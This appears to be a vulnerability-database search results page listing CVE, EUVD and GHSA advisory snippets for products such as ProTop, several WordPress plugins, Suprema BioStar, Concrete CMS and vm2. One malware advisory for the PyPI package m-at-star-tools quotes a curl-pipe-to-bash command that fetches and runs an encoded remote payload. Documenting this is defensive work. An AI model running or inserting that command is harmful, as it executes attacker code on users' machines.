1281 matches found
White Star Software ProTop - Directory Traversal
A directory traversal vulnerability was discovered in White Star Software Protop version 4.4.2-2024-11-27, specifically in the /pt3upd/ endpoint. An unauthenticated attacker can remotely read arbitrary files on the underlying OS using encoded traversal sequences. id: CVE-2025-44177 info: name:...
CVE-2026-42670
Missing Authorization vulnerability in Etoile Web Design Incorporated Five Star Restaurant Reservations allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Five Star Restaurant Reservations: from n/a through 2.7.14...
EUVD-2026-33908
Missing Authorization vulnerability in Etoile Web Design Incorporated Five Star Restaurant Reservations allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Five Star Restaurant Reservations: from n/a through 2.7.14...
CVE-2026-42670
CVE-2026-42670 concerns the WordPress plugin for Five Star Restaurant Reservations (versions
CVE-2026-42670 WordPress Five Star Restaurant Reservations plugin <= 2.7.14 - Payment Bypass vulnerability
Missing Authorization vulnerability in Etoile Web Design Incorporated Five Star Restaurant Reservations allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Five Star Restaurant Reservations: from n/a through 2.7.14...
PT-2026-45734
Missing Authorization vulnerability in Etoile Web Design Incorporated Five Star Restaurant Reservations allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Five Star Restaurant Reservations: from n/a through 2.7.14...
CVE-2026-9509
CVE-2026-9509 affects Suprema BioStar 2 Server (versions 2.9.8, 2.9.10, 2.9.11). An unhandled exception triggered by unauthenticated HTTP POST requests to the /api/migration endpoint can cause a denial of service, halting critical processes and leaving the system offline until services or the ser...
Suprema BioStar 安全漏洞
Suprema BioStar is a web-based, open-integrated security platform developed by the South Korean company Suprema. It offers comprehensive features for access control, attendance management, visitor management, and video log maintenance. Versions 2.9.8, 2.9.10, and 2.9.11 of Suprema BioStar contain...
MAL-2026-4812 Malicious code in m-at-star-tools (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2934ab77e0615ccddf2cf336b023659bafca2fe94bbf2f78e4c0d2a2ba1d7bf2 The package's sole consolescript m0scan m0scan/main.py:6-7 executes curl -sL https://mspy.qzz.io/M0scan | base64 -d | bash, fetching an opaque...
Malicious code in m-at-star-tools (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2934ab77e0615ccddf2cf336b023659bafca2fe94bbf2f78e4c0d2a2ba1d7bf2 The package's sole consolescript m0scan m0scan/main.py:6-7 executes curl -sL https://mspy.qzz.io/M0scan | base64 -d | bash, fetching an opaque...
CVE-2026-6864 CBX 5 Star Rating & Review <= 1.0.7 - Reflected Cross-Site Scripting via 'page' Parameter
The CBX 5 Star Rating & Review plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.0.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject...
EUVD-2026-31409
The CBX 5 Star Rating & Review plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.0.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject...
CVE-2026-6864 CBX 5 Star Rating & Review <= 1.0.7 - Reflected Cross-Site Scripting via 'page' Parameter
The CBX 5 Star Rating & Review plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.0.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject...
WordPress plugin CBX 5 Star Rating & Review 跨站脚本漏洞
WordPress and WordPress plugins are both products of the WordPress Foundation. WordPress is a blog platform developed using the PHP language. This platform allows for the creation of personal blog websites on servers based on PHP and MySQL. A WordPress plugin is an application extension. WordPres...
CVE-2026-8432 Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/backend/file star()
Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery CSRF at concrete/controllers/backend/file star. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Dror...
CVE-2026-8432 Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/backend/file star()
Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery CSRF at concrete/controllers/backend/file star. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Dror...
CVE-2026-8432
Concrete CMS versions prior to 9.5.0 are affected by a Cross-Site Request Forgery (CSRF) at the endpoint concrete/controllers/backend/file star(), due to a flaw in the star() function. Affected range includes 9.0.0 through 9.4.x. The issue is exploited by convincing an authenticated user to perfo...
EUVD-2026-30086
vm2 Has a Sandbox Breakout Using Async Generator...
GHSA-248R-7H7Q-CR24 vm2 Has a Sandbox Breakout Using Async Generator
Summary VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system. Details It is possible to catch a host exception using the yield expression inside an async generator. When the...
Arbitrary Code Injection
Overview org.webjars.npm:vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules. Affected versions of this package are vulnerable to Arbitrary Code Injection through the yield iterator inside an async generator. An attacker can execute arbitrary commands on the host...